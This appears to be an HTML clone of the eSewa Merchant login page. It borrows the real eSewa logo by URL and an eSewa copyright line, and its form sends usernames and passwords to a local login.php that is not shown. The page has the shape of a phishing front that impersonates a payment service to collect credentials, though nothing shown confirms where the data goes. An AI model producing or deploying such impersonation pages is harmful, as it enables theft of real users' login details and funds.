<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>eSewa Merchant</title>
  <style>
  /* Style for asterisks */
  .form-group label:after {
    content: "*";
    color: red;
  }
/* Style for checkbox container */
  .checkbox-container {
    display: flex;
    align-items: center;
    margin-bottom: 5px; /* Adjust as needed */
  }

  /* Style for checkbox */
  .checkbox-container input[type="checkbox"] {
    margin-right: 4px; /* Adjust as needed */
  }

  /* Style for forgot password button */
  .forgot-password-btn {
    background-color: #FFFFFF; /* Button color */
    color: #000000; /* Text color */
    padding: 0px 0px; /* Adjust padding as needed */
    border: none;
    border-radius: 5px;
    cursor: pointer;
  }
  body {
    font-family: Arial, sans-serif;
    background-color: #f4f6f9;
  }
  .container {
    width: 300px;
    margin: 0 auto;
    padding: 20px;
    background-color: #fff9;
    border-radius: 8px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  }
  .container h2 {
    text-align: center;
    margin-bottom: 20px;
  }
  .form-group {
    margin-bottom: 20px;
  }
  .form-group label {
    display: block;
    margin-bottom: 5px;
    font-weight: bold;
  }
  .form-group input {
    width: 100%;
    padding: 10px;
    border: 1px solid #ccc;
    border-radius: 4px;
  }
  .form-group button {
    width: 100%;
    padding: 10px;
    background-color: #90EE90;
    color: #fff;
    border: none;
    border-radius: 5px;
    cursor: pointer;
  }
  .form-group button:hover {
    background-color: #f4f6f9;
  }
</style>
</head>
<body>
  <img src="  https://merchant.esewa.com.np/assets/img/merchant-logo.svg" alt="Logo Esewa" height="25" width="100"
<div class="container">
  <pre>    

<!--This is pre tag to adjust size of -->

</pre>
  <div class="container">
  <pre>
</pre>
 <h1>Login</h1>
<form action="login.php" method="POST">
    <div class="form-group">
  <label for="username" class="required">Username </label>
  <input type="text" id="username" name="username" placeholder="Email ID or Mobile Number">
</div>
<div class="form-group">
  <label for="password" class="required">password </label>
  <input type="password" id="password" name="password" placeholder="password">
</div>

    <!-- Checkbox and Forgot Password Button -->
<div class="checkbox-container">
  <input type="checkbox" id="remember-me">
  <label for="remember-me"><pre>Remember me</pre></label><pre>        </pre>
  <button class="forgot-password-btn" onclick="window.location.href='forgot_password.html'"><pre>Forgot Password?</pre></button>
</div>
    <pre>  </pre>
 <div class="form-group">
      <button type="submit">LOGIN</button>
    </div>
  </form>
</div>
</body><body>
<pre> 

 <!--This blank space is pre tag to adjust site size-->
 
   © 2009-2024 eSewa. All rights reserved.
   
  </pre>
  
  </body>
  
  
</html>
